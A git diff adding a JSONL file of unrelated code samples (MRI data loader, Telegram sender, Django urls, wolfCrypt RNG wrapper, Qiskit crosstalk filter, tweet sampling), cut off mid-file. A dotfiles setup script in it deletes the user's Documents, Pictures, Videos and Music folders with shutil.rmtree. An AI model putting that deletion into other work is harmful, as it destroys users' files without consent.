diff --git "a/4566.jsonl" "b/4566.jsonl" new file mode 100644--- /dev/null +++ "b/4566.jsonl" @@ -0,0 +1,633 @@ +{"seq_id":"275409838","text":"from genericpath import exists\nimport os\nimport torch\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import ToTensor\nimport transform_data\n\n\"\"\"\n Class representing the dataset we use for training the neural network\n\"\"\"\n\n# Path to where the OASIS dataset is located\n# If datageneration is true, this is also the location where the other dataset is created\n# NOTE: In principle this is the only thing that has to be changed\npath_to_data = \"Y:\\Datasets\\OASIS I\"\n# Putting the data on your SSD is much faster, unsurprsingly\npath_to_data_storage = r\"C:\\Users\\daan\\Desktop\\datasets\\MRI\"\n\npath_to_data_ = os.path.join(path_to_data_storage, \"transformed\")\npath_to_data_k = os.path.join(path_to_data_storage, \"kspace\")\n\ntraining = \"training\"\nvalidation = \"validation\"\nvalidation_full = \"denoise_validation\"\n\nfull = \"full\"\nmasked = \"masked\"\n\ntraining_path = os.path.join(path_to_data_, training)\nvalidation_path = os.path.join(path_to_data_, validation)\ntraining_path_k = os.path.join(path_to_data_k, training)\nvalidation_path_k = os.path.join(path_to_data_k, validation)\nvalidation_full_path = os.path.join(path_to_data_, validation_full)\n\n# Path to where the training portion of the data is stored\nraw_path = os.path.join(training_path, full)\nmasked_path = os.path.join(training_path, masked)\nraw_path_k = os.path.join(training_path_k, full)\nmasked_path_k = os.path.join(training_path_k, masked)\n\n# Path to where the validation portion of the data is stored\nval_raw_path = os.path.join(validation_path, full)\nval_masked_path = os.path.join(validation_path, masked)\nval_raw_path_k = os.path.join(validation_path_k, full)\nval_masked_path_k = os.path.join(validation_path_k, masked)\n\n# Path where the complete images used for validation are stored\nval_full_raw_path = os.path.join(validation_full_path, full)\nval_full_masked_path = os.path.join(validation_full_path, masked)\n\ndef show_image(img):\n plt.imshow(img, cmap=\"gray\")\n plt.axis(\"off\")\n\nclass MRIDataset_2(Dataset):\n \"\"\" MRI images dataset \"\"\"\n\n def __init__(self, raw_dir, masked_dir, length, transform=None):\n \"\"\"\n Params:\n root_dir: Directory with the images\n \"\"\"\n self.raw_dir = raw_dir\n self.masked_dir = masked_dir\n self.transform = transform\n self.length = length\n self.indices = pd.DataFrame([f\"mri{n}.npy\" for n in range(1,self.length+1)])\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n raw_img_path = os.path.join(self.raw_dir, self.indices.iloc[idx, 0])\n masked_img_path = os.path.join(self.masked_dir, self.indices.iloc[idx, 0])\n\n raw_images = np.load(raw_img_path)\n masked_images = np.load(masked_img_path)\n\n if self.transform is not None:\n raw_images = self.transform(raw_images)\n masked_images = self.transform(masked_images)\n \n return masked_images, raw_images\n\ndef get_dataset(batch_size):\n # NOTE: You have to change the total datasize manually, dont know of a good way for this yet (103680, 38880)\n training_data = DataLoader(MRIDataset_2(raw_path, masked_path, 103680, ToTensor()), batch_size=batch_size, shuffle=True)\n validation_data = DataLoader(MRIDataset_2(val_raw_path, val_masked_path, 
38880, ToTensor()), batch_size=batch_size, shuffle=True)\n\n return training_data, validation_data\n\ndef get_dataset_full_image(batch_size):\n data = DataLoader(MRIDataset_2(val_full_raw_path, val_full_masked_path, 160, ToTensor()), batch_size=batch_size, shuffle=True)\n\n return data\n\ndef get_k_space_dataset(batch_size):\n # NOTE: You have to change the total datasize manually, don't know of a good way for this yet (103680, 38880)\n training_data = DataLoader(MRIDataset_2(raw_path_k, masked_path_k, 5120, ToTensor()), batch_size=batch_size, shuffle=True)\n validation_data = DataLoader(MRIDataset_2(val_raw_path_k, val_masked_path_k, 1120, ToTensor()), batch_size=batch_size, shuffle=True)\n\n return training_data, validation_data\n\nif __name__ == \"__main__\":\n\n # NOTE: data generation is slow, make sure this is only run once\n # (that is why it only happens inside this __main__ block)\n data_generation = False\n val_data_generation = False\n data_generation_k = True\n\n # Make the folders if they are not yet made\n try:\n os.makedirs(path_to_data_, exist_ok=True)\n os.makedirs(path_to_data_k, exist_ok=True)\n except OSError as error:\n pass\n\n try:\n os.makedirs(training_path, exist_ok=True)\n os.makedirs(validation_path, exist_ok=True)\n os.makedirs(training_path_k, exist_ok=True)\n os.makedirs(validation_path_k, exist_ok=True)\n os.makedirs(validation_full_path, exist_ok=True)\n except OSError as error:\n pass\n\n try:\n os.makedirs(raw_path, exist_ok=True)\n os.makedirs(masked_path, exist_ok=True)\n os.makedirs(val_raw_path, exist_ok=True)\n os.makedirs(val_masked_path, exist_ok=True)\n os.makedirs(raw_path_k, exist_ok=True)\n os.makedirs(masked_path_k, exist_ok=True)\n os.makedirs(val_raw_path_k, exist_ok=True)\n os.makedirs(val_masked_path_k, exist_ok=True)\n os.makedirs(val_full_raw_path, exist_ok=True)\n os.makedirs(val_full_masked_path, exist_ok=True)\n except OSError as error: \n pass\n\n if data_generation:\n transform_data.process_data(path_to_data, raw_path, masked_path, val_raw_path, val_masked_path)\n\n if val_data_generation:\n transform_data.create_test_data(path_to_data, val_full_raw_path, val_full_masked_path)\n\n if data_generation_k:\n transform_data.create_k_space_data(path_to_data, raw_path_k, masked_path_k, val_raw_path_k, val_masked_path_k)","sub_path":"neural_network/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"58053819","text":"import time\n\ntry:\n # pip install python-telegram-bot\n import telegram\n from telegram import MAX_MESSAGE_LENGTH, TelegramError\n from telegram.error import BadRequest, NetworkError\nexcept ModuleNotFoundError:\n pass\n\nfrom ..generaltools.blaster_logger import log_this, logger # uses log_this and logger from general/blaster_logger.py\n\n\n@log_this\ndef send_message(\n bot,\n user_id,\n response,\n parse_mode=\"MARKDOWN\",\n reply_markup=None,\n disable_web_page_preview=True,\n):\n \"\"\"\n Sends a message to user_id.\n\n Splits the message into shorter messages of at most MAX_MESSAGE_LENGTH (set by Telegram). If the message is shorter, it becomes a\n list of 1 item. Sends the messages from the list. Handles all kinds of possible errors while sending and tries to deliver\n anyway. 
Doesn't guarantee delivery.\n\n :param bot:\n :param user_id:\n :param response:\n :param parse_mode:\n :param reply_markup:\n :param disable_web_page_preview:\n :return: sent object of the last message sent\n \"\"\"\n\n split_message = _split_message_by_telegram_requirements(response)\n return _send_split_message(\n bot,\n user_id,\n split_message,\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n\n\n@log_this\ndef _send_single_message(\n bot,\n telegram_id,\n message,\n parse_mode=\"MARKDOWN\",\n reply_markup=None,\n disable_web_page_preview=True,\n):\n sent = None\n try:\n sent = bot.send_message(\n chat_id=telegram_id,\n text=message,\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n except BadRequest as e:\n logger.error(f\"{e}: {telegram_id}\")\n except NetworkError as e:\n logger.error(e)\n except TelegramError as e:\n error_msg = f\"TelegramError while sending message: {e}\"\n logger.error(error_msg)\n sent = bot.send_message(\n chat_id=telegram_id,\n text=message.replace(\"\\\\\", \"\"),\n parse_mode=None,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n except UnicodeEncodeError as e:\n logger.warning(f\"send_message: {e}\")\n\n return sent\n\n\n@log_this\ndef _split_message_by_telegram_requirements(message):\n chunks, chunk_size = len(message), MAX_MESSAGE_LENGTH\n split_message = [message[i : i + chunk_size] for i in range(0, chunks, chunk_size)]\n return split_message\n\n\n@log_this\ndef _send_split_message(\n bot,\n telegram_id,\n split_message,\n parse_mode=None,\n reply_markup=None,\n disable_web_page_preview=None,\n):\n for i in range(len(split_message)):\n if i < (len(split_message) - 1):\n _send_single_message(\n bot,\n telegram_id,\n split_message[i],\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n time.sleep(1)\n else:\n return _send_single_message(\n bot,\n telegram_id,\n split_message[i],\n parse_mode=parse_mode,\n reply_markup=reply_markup,\n disable_web_page_preview=disable_web_page_preview,\n )\n","sub_path":"telegramtools/send_message.py","file_name":"send_message.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"79688128","text":"#!/usr/bin/env python\nimport shutil\nimport os\nimport argparse\n\ndef file_manager(home):\n # manage all the files\n to_del = ['Documents', 'Pictures', 'Videos', 'Public', 'Templates', 'Music']\n # delete the default folders\n for item in to_del:\n shutil.rmtree( home+item, True)\n # now create the wanted folders\n add_files = ['Go/src/github.com/n7-fury', 'Src', 'Go/bin', 'Go/pkg', 'Files', 'Media/Music', 'Media/Video', 'Media/Pictures']\n for item in add_files:\n try:\n os.makedirs(home + item)\n except OSError:\n pass\n\n\ndef editor(home,nvim=False):\n editor_path = '.vim'\n # use the .nvim directory instead when nvim is requested\n if nvim:\n editor_path = '.nvim'\n shutil.rmtree(home+editor_path, True)\n shutil.copytree(os.getcwd()+'/vim', home+editor_path)\n # rename the copied vimrc to nvimrc\n if nvim:\n os.replace(home+'.nvim/vimrc', home+'.nvim/nvimrc') \n\n\ndef fish_conf(home):\n xdg = os.getenv(\"XDG_CONFIG_HOME\", home+\".config\")\n if not xdg[-1] == '/':\n xdg = xdg + '/'\n shutil.rmtree(xdg+'fish')\n shutil.copytree(os.getcwd()+'/fish', xdg+'fish/')\n\ndef tmux_conf(home):\n shutil.copyfile(os.getcwd()+'/tmux/tmux.conf', home+'.tmux.conf')\n\ndef main():\n # parse 
arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('--nvim', dest=\"nvim\", help='set up nvim instead of vim',\n action='store_true', default=False)\n args = parser.parse_args()\n\n home = os.getenv(\"HOME\")\n if not home[-1] == \"/\":\n home = home + \"/\"\n file_manager(home)\n editor(home, args.nvim)\n fish_conf(home)\n\nif __name__ == '__main__':\n main()\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"350545262","text":"def main():\n nums = [10, 15, 3, 7, -10]\n k = -3\n result = doTwoElementsSumToK(nums, k)\n print(result)\n test_negative_case()\n test_positive_case()\n\n\n#Time: O(n) - n constant time insertions and lookups in hash table\n#Additional space: O(n) - store n complements in hash table\ndef doTwoElementsSumToK(numbers, k): \n complements = {}\n for n in numbers:\n if(n in complements):\n return True\n complements[k-n] = True\n return False\n\n#Scaling\n#Two pass approach\n#Divide input across machines\n#Pass #1: populate the shared complement table - coordinate \"done\"\n#Pass #2: listen for \"done\" then check local number list against complements - broadcast result\n\n#Tests\ndef test_positive_case():\n nums = [10, 15, 3, 7]\n k = 17\n assert(doTwoElementsSumToK(nums, k) == True)\n\ndef test_negative_case():\n nums = [10, 15, 3, 7]\n k = 99\n assert(doTwoElementsSumToK(nums, k) == False)\n\nif __name__ == \"__main__\":\n main()","sub_path":"p1.py","file_name":"p1.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"235636353","text":"def main():\n pic=makePicture(pickAFile())\n show(pic)\n for px in getPixels(pic):\n r=getRed(px)\n g=getGreen(px)\n b=getBlue(px)\n # 255 is the maximum channel value, so 255-x inverts each colour channel\n negColor=makeColor(255-r,255-g,255-b)\n setColor(px, negColor)\n repaint(pic)","sub_path":"JYTHON/class_oct31_negColor.py","file_name":"class_oct31_negColor.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"307311295","text":"import sys\nsys.stdin = open('거듭제곱input.txt')\n\nT=10\n\ndef multi(N, M):\n if M==0:\n return 1\n else:\n M-=1\n return N * multi(N,M) \n\nfor tc in range(1, T+1):\n a=input()\n N, M = list(map(int, input().split()))\n res=0\n res=multi(N, M)\n\n print(f'#{tc} {res}')\n","sub_path":"SWexpert/D3/거듭제곱.py","file_name":"거듭제곱.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"190644107","text":"from django.urls import path\nfrom . 
import views\n\n# base App urls\napp_name= 'base'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('dashboard', views.dashboard, name='dashboard'),\n path('reboot', views.reboot, name=\"reboot\"),\n path('classes', views.classes, name='classes'),\n path('variables', views.variables, name='variables')\n]","sub_path":"base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"191642101","text":"#-------------------------------------------------------------------------------\n# dump.py\n# Dump binary files into C arrays.\n#-------------------------------------------------------------------------------\n\nVersion = 3\n\nimport sys\nimport os.path\nimport yaml\nimport genutil\n\n#-------------------------------------------------------------------------------\ndef get_file_path(filename, file_path) :\n '''\n Returns absolute path to an input file, given file name and \n another full file path in the same directory.\n '''\n return '{}/{}'.format(os.path.dirname(file_path), filename)\n\n#-------------------------------------------------------------------------------\ndef get_file_cname(filename) :\n return 'dump_{}'.format(os.path.splitext(filename)[0])\n\n#-------------------------------------------------------------------------------\ndef gen_header(out_hdr, files) :\n with open(out_hdr, 'w') as f:\n f.write('#pragma once\\n')\n f.write('// #version:{}#\\n'.format(Version))\n f.write('// machine generated, do not edit!\\n')\n items = {}\n for file in files :\n file_path = get_file_path(file, out_hdr)\n if os.path.isfile(file_path) :\n with open(file_path, 'rb') as src_file:\n file_data = src_file.read()\n file_name = get_file_cname(file)\n file_size = os.path.getsize(file_path)\n items[file_name] = file_size\n f.write('unsigned char {}[{}] = {{\\n'.format(file_name, file_size)) \n num = 0\n for byte in file_data :\n if sys.version_info[0] >= 3:\n f.write(hex(ord(chr(byte))) + ', ')\n else:\n f.write(hex(ord(byte)) + ', ')\n num += 1\n if 0 == num%16:\n f.write('\\n')\n f.write('\\n};\\n')\n else :\n genutil.fmtError(\"Input file not found: '{}'\".format(file_path))\n f.write('typedef struct { const char* name; const uint8_t* ptr; int size; } dump_item;\\n')\n f.write('#define DUMP_NUM_ITEMS ({})\\n'.format(len(items)))\n f.write('dump_item dump_items[DUMP_NUM_ITEMS] = {\\n')\n for name,size in sorted(items.items()):\n f.write('{{ \"{}\", {}, {} }},\\n'.format(name[5:], name, size))\n f.write('};\\n')\n\n#-------------------------------------------------------------------------------\ndef generate(input, out_src, out_hdr) :\n if genutil.isDirty(Version, [input], [out_hdr]) :\n with open(input, 'r') as f :\n desc = yaml.load(f)\n gen_header(out_hdr, desc['files'])\n","sub_path":"fips-files/generators/dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"86247203","text":"# random.py\n#\n# Copyright (C) 2006-2016 wolfSSL Inc.\n#\n# This file is part of wolfSSL. 
(formerly known as CyaSSL)\n#\n# wolfSSL is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# wolfSSL is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA\nfrom wolfcrypt._ffi import ffi as _ffi\nfrom wolfcrypt._ffi import lib as _lib\nfrom wolfcrypt.utils import t2b\n\nfrom wolfcrypt.exceptions import *\n\n\nclass Random(object):\n \"\"\"\n A Cryptographically Secure Pseudo Random Number Generator - CSPRNG\n \"\"\"\n def __init__(self):\n self.native_object = _ffi.new(\"WC_RNG *\")\n\n ret = _lib.wc_InitRng(self.native_object)\n if ret < 0:\n self.native_object = None\n raise WolfCryptError(\"RNG init error (%d)\" % ret)\n\n\n def __del__(self):\n if self.native_object:\n _lib.wc_FreeRng(self.native_object)\n\n\n def byte(self):\n \"\"\"\n Generate and return a random byte.\n \"\"\"\n result = _ffi.new('byte[1]')\n\n ret = _lib.wc_RNG_GenerateByte(self.native_object, result)\n if ret < 0:\n raise WolfCryptError(\"RNG generate byte error (%d)\" % ret)\n\n return _ffi.buffer(result, 1)[:]\n\n\n def bytes(self, length):\n \"\"\"\n Generate and return a random sequence of length bytes.\n \"\"\"\n result = _ffi.new('byte[%d]' % length)\n\n ret = _lib.wc_RNG_GenerateBlock(self.native_object, result, length)\n if ret < 0:\n raise WolfCryptError(\"RNG generate block error (%d)\" % ret)\n\n return _ffi.buffer(result, length)[:]\n","sub_path":"components/hap/wolfssl/wrapper/python/wolfcrypt/wolfcrypt/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"148791925","text":"import logging\nfrom functools import lru_cache\n\nlogger = logging.getLogger(__name__)\n\n\ndef parse_adapter_input(adapters):\n # Separate by lines, convert to integer, prepend the initial adapter (0) and append the final adapter (max + 3)\n adapters = [0] + sorted(int(x) for x in adapters.split(\"\\n\") if x)\n adapters.append(max(adapters) + 3)\n\n return adapters\n\n\ndef get_adapter_differences(adapters):\n # Given all adapters need to be used, this is just a matter of sorting them and computing the differences\n adapters = parse_adapter_input(adapters)\n adapters_delta = [adapters[i + 1] - adapters[i] for i in range(len(adapters) - 1)]\n\n return adapters_delta\n\n\ndef get_adapter_path_count(adapters):\n # Parse and convert adapters to tuple (because lru_cache decorated functions need hashable arguments)\n adapters = tuple(parse_adapter_input(adapters))\n return get_adapter_path_count_priv(adapters)\n\n\n@lru_cache()\ndef get_adapter_path_count_priv(adapters, current=0):\n # Get the next adapter indices\n next_indices = [x for x in range(current + 1, current + 4) if x < len(adapters)]\n\n # If there are no more indices, we're at base case so return 1\n if not next_indices:\n return 1\n\n # Otherwise, sum all branches from matching adapters (according to <= 3 criteria)\n return sum(\n get_adapter_path_count_priv(adapters, i)\n 
for i in next_indices\n if adapters[i] - adapters[current] <= 3\n )\n","sub_path":"day10/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"212608567","text":"import networkx as nx\nfrom experiments.utils.pickle_tools import pickle_dump, pickle_load\n\nfrom pprint import pprint\n\n\ndef xtalk_scoped_bprop(backend, xtalk_property=None, num_requird_hw_qubits=None):\n \"\"\"\n To evaluate the performance of the crosstalk compiler,\n keep only a set of qubits and qubit connections that is guaranteed to contain crosstalk,\n and restrict the QPU resources usable in the experiment (i.e. modify the backend_property).\n\n Only backend_prop.gates and backend_prop.qubits, which are used inside the pass_manager, are changed.\n\n Args:\n backend : IBMQBackend\n xtalk_property :\n num_requird_hw_qubits : number of qubits to be used in later experiments\n Returns:\n backend_property scoped on backend xtalk characteristics\n \"\"\"\n\n if xtalk_property is None and num_requird_hw_qubits is None:\n return _choose_topology_byhand(backend)\n\n backend_prop = backend.properties()\n xtalk_ratio_graph = nx.Graph()\n\n # build the crosstalk-ratio graph of the processor\n for ginfo in backend_prop.gates:\n if ginfo.gate == \"cx\":\n xtalk_ratio = 1.0\n xtalk_ratio_graph.add_edge(\n ginfo.qubits[0], ginfo.qubits[1], weight=xtalk_ratio\n )\n \"\"\"TODO\n Based on xtalk_property, reflect the impact of crosstalk\n on the cx error rate in xtalk_ratio,\n and complete the xtalk_ratio_graph\n \"\"\"\n\n # based on xtalk_ratio_graph,\n # select the qubits and two-qubit gates to use in the experiment\n qubits_exp = []\n gates_exp = []\n\n # remove the qubits and two-qubit gates that are not needed for the experiment\n # bprop.qubits() bprop.gates()\n\n return backend_prop\n\n\ndef _choose_topology_byhand(backend):\n \"\"\"\n As of 2020/10/12 on ibmq_toronto:\n select the qubits and two-qubit gates that are strongly affected by crosstalk\n \"\"\"\n\n selected_qubits = [\n # 2,\n # 3,\n # 4,\n 5,\n 7,\n 8,\n 10,\n 11,\n 12,\n 13,\n 14,\n 15,\n 16,\n 18,\n 19,\n 21,\n 22,\n 23,\n 24,\n 25,\n 26,\n ]\n selected_edges = [\n # (0, 1), (1, 0),\n # (1, 2), (2, 1),\n # (1, 4), (4, 1),\n # (2, 3),\n # (3, 2),\n # (3, 5), (5, 3),\n # (4, 7), (4, 7),\n (5, 8),\n (8, 5),\n # (7, 6), (6, 7),\n (7, 10),\n (10, 7),\n (8, 11),\n (11, 8),\n # (8, 9), (9, 8),\n (10, 12),\n (12, 10),\n (11, 14),\n (14, 11),\n (12, 13),\n (13, 12),\n (12, 15),\n (15, 12),\n (13, 14),\n (14, 13),\n (14, 16),\n (16, 14),\n (15, 18),\n (18, 15),\n # (16, 19), (19, 16),\n # (18, 17), (17, 18),\n # (18, 21), (21, 18),\n # (19, 20), (20, 19),\n (19, 22),\n (22, 19),\n (21, 23),\n (23, 21),\n (22, 25),\n (25, 22),\n (23, 24),\n (24, 23),\n (24, 25),\n (25, 24),\n (25, 26),\n (26, 25),\n ]\n\n _backend_prop = backend.properties()\n _backend_conf = backend.configuration()\n\n num_hw_qubit = _backend_conf.n_qubits\n hw_qubits = [q for q in range(num_hw_qubit)]\n\n # eliminate unselected qubits from _backend_prop\n for hw_qubit in reversed(hw_qubits):\n if hw_qubit not in selected_qubits:\n del _backend_prop.qubits[hw_qubit]\n\n # eliminate unselected gates from _backend_prop\n gates = []\n for ginfo in _backend_prop.gates:\n if ginfo.gate == \"cx\":\n if ginfo.qubits in selected_edges:\n gates.append(ginfo)\n if (\n ginfo.gate == \"id\"\n or ginfo.gate == \"u1\"\n or ginfo.gate == \"u2\"\n or ginfo.gate == \"u3\"\n ):\n if ginfo.qubits[0] in selected_qubits:\n gates.append(ginfo)\n\n _backend_prop.gates = gates\n\n return _backend_prop\n","sub_path":"compiler/utils/experimental_backend_regulation.py","file_name":"experimental_backend_regulation.py","file_ext":"py","file_size_in_byte":4146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"228435403","text":"#!/usr/bin/env 
python3\n\"\"\"\nNormalizes and tokenizes every sentence in a corpus using the Moses normalizer and tokenizer.\n\nTakes three arguments:\n* the language of the corpus (language code)\n* the path to the corpus file\n* the path to the output file\n\"\"\"\nfrom sacremoses import MosesPunctNormalizer, MosesTokenizer\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"lang\", type=str, help=\"Language of the corpus\")\nparser.add_argument(\"f_in\", type=str, help=\"Path to the corpus\")\nparser.add_argument(\"f_out\", type=str, help=\"Output path\")\n\nargs = parser.parse_args()\n\nnormalizer = MosesPunctNormalizer(args.lang)\ntokenizer = MosesTokenizer(args.lang)\n\nwith open(args.f_in, 'r', encoding='UTF-8') as f_in, open(args.f_out, 'w', encoding='UTF-8') as f_out:\n for line in f_in:\n line = line.strip()\n if line != '':\n line = normalizer.normalize(line)\n line = tokenizer.tokenize(line, return_str=True, escape=False)\n f_out.write(line + '\\n')\n","sub_path":"scripts/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"71142726","text":"from qualifier.output_data import OutputData\nfrom qualifier.schedule import Schedule\nfrom qualifier.strategy import Strategy\n\n\nclass AtleastOneCar(Strategy):\n name = 'AtleastOneCar'\n\n def solve(self, input_data):\n\n streets_with_cars = self.streets_with_car_at_light(input_data)\n\n schedules = []\n for intersection in input_data.intersections:\n traffic_lights = []\n for street in intersection.incoming_streets:\n if street.name in streets_with_cars:\n traffic_lights.append((street.name, 1))\n\n schedule = Schedule(intersection.index, tuple(traffic_lights))\n schedules.append(schedule)\n\n return OutputData(tuple(schedules))\n","sub_path":"qualifier/strategies/AtleastOneCar.py","file_name":"AtleastOneCar.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"643647390","text":"'''\nCreated on Apr 25, 2017\n\n@author: dicle\n'''\n\nimport os, json\nimport random\nimport string, re\n\nfrom dataset import io_utils\n\n# counts the tweets in the given folder which has days as subfolders\ndef count_tweets(folderpath, outfolder):\n \n N = 0\n Nr = 0\n Ntr = 0\n \n days = io_utils.getfoldernames_of_dir(folderpath)\n \n print(folderpath)\n for day in days:\n \n p1 = os.path.join(folderpath, day)\n \n fnames = io_utils.getfilenames_of_dir(p1, removeextension=False)\n \n for fname in fnames:\n \n p2 = os.path.join(p1, fname)\n '''\n lines = open(p2, \"r\").readlines()\n nlines = len(lines)\n '''\n \n tweets = lines2tweets(p2)\n ntweets = len(tweets)\n \n tr_tweets = count_lang_tweets(tweets, lang=\"tr\")\n ntrtweets = len(tr_tweets)\n \n plain_tweets = count_nonreply_tweets(tr_tweets)\n nptweets = len(plain_tweets)\n \n print(\" \", day,\" / \", fname, \" # lines: \", ntweets, \" # tr_tweets: \", ntrtweets, \" # non-reply tweets: \", nptweets)\n \n N += ntweets\n Nr += nptweets\n Ntr += ntrtweets\n \n \n if ntrtweets > 0:\n outpath_tr = os.path.join(outfolder, day+\"_\"+fname)\n json.dump(tr_tweets, open(outpath_tr, \"w\"))\n \n if nptweets > 0:\n outpath_nr = os.path.join(outfolder, day+\"_\"+fname+\"-nonreply\")\n json.dump(plain_tweets, open(outpath_nr, \"w\"))\n \n return N, Ntr, Nr\n \n \n\ndef lines2tweets(filepath):\n \n lines = open(filepath, \"r\").readlines()\n \n lines = [line.strip() for line in 
lines]\n \n tweets = [json.loads(line) for line in lines]\n \n return tweets\n\n \ndef count_lang_tweets(tweets, lang=\"tr\"): \n\n lang_tweets = []\n\n for tweet in tweets:\n \n tlang = tweet[\"gnip\"][\"language\"][\"value\"]\n if tlang == lang:\n lang_tweets.append(tweet)\n \n return lang_tweets\n \n\ndef count_nonreply_tweets(tweets):\n \n plain_tweets = []\n \n for tweet in tweets:\n \n keys = list(tweet.keys())\n \n if \"inReplyTo\" not in keys:\n plain_tweets.append(tweet)\n\n return plain_tweets\n\n\n\ndef _sample_N_tweets(folderpath, N, filtrate=None, keywords=None):\n\n print(folderpath)\n fnames = io_utils.getfilenames_of_dir(folderpath, removeextension=False)\n \n fnames = [i for i in fnames if i.endswith(\"-nonreply\")]\n\n all_tweets = []\n for fname in fnames:\n \n p = os.path.join(folderpath, fname)\n tweets = json.load(open(p, \"r\"))\n all_tweets.extend(tweets)\n #print(fname, len(tweets), len(all_tweets))\n \n if filtrate and keywords:\n all_tweets = filtrate(keywords, all_tweets)\n \n random.shuffle(all_tweets)\n print(len(all_tweets), N)\n selected_tweets = random.sample(all_tweets, min(len(all_tweets), N))\n return selected_tweets\n\n\n\ndef ignore_containing(keywords, tweets):\n \n filtrated_tweets = []\n for tweet in tweets:\n _text = tweet[\"body\"]\n \n accept = True\n for keyword in keywords:\n if re.search(keyword, _text, re.IGNORECASE):\n accept = False\n pass\n \n if accept:\n filtrated_tweets.append(tweet) \n \n \n return filtrated_tweets\n\ndef select_tweets():\n \n sep = \";\"\n inroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/tr_tweets\"\n outroot = \"/home/dicle/Documents/data/tr_twitter_raw25Apr/selections\"\n #folders = [\"tr_201301\", \"tr_201302\", \"tr_201303\"]\n folders = [\"tr_201302\", \"tr_201303\", \"tr_201301\"]\n N = 700\n \n stweets = []\n for folder in folders:\n fpath = os.path.join(inroot, folder)\n tweets = _sample_N_tweets(fpath, N, ignore_containing, keywords=[\"ttnet_muzik\", \"ttnet müzik\", \"I'm at\"])\n print(\" \", len(tweets))\n stweets.extend(tweets)\n \n\n rows = []\n print(\"stweets: \", len(stweets))\n for tweet in stweets:\n _id = tweet[\"object\"][\"id\"]\n _link = tweet[\"object\"][\"link\"]\n _text = tweet[\"body\"]\n \n _text = _text.replace(\";\", \",,,\") # replace semicolon\n # replace url ??\n \n rows.append({\"id\" : _id,\n \"link\" : _link,\n \"body\" : _text})\n \n import pandas as pd\n df = pd.DataFrame(rows)\n print(df.shape)\n outpath = os.path.join(outroot, \n str(df.shape[0])+\"tweets_\"+str(random.choice(range(100)))+\"\".join(random.sample(string.ascii_letters, 4))+\".csv\") \n \n df.to_csv(outpath, sep=sep, index=False)\n\n\n\n\ndef tweets2csv(tweets):\n \n header = [\"id\", \"link\", \"body\"]\n \n rows = []\n \n for tweet in tweets:\n _id = tweet[\"object\"][\"id\"]\n _link = tweet[\"object\"][\"link\"]\n _text = tweet[\"body\"]\n rows.append({\"id\" : _id,\n \"link\" : _link,\n \"body\" : _text})\n \n import pandas as pd\n df = pd.DataFrame(rows)\n return df\n\n\n'''\ndef tweets2csv(inpath, outpath):\n \n header = [\"id\", \"link\", \"body\"]\n \n rows = []\n \n tweets = json.load(open(inpath, \"r\"))\n \n for tweet in tweets:\n _id = tweet[\"object\"][\"id\"]\n _link = tweet[\"object\"][\"link\"]\n _text = tweet[\"body\"]\n rows.append({\"id\" : _id,\n \"link\" : _link,\n \"body\" : _text})\n \n import pandas as pd\n df = pd.DataFrame(rows)\n df.to_csv(outpath, sep=\"\\t\", index=False)\n\n''' \n\nif __name__ == '__main__':\n \n '''\n inroot = 
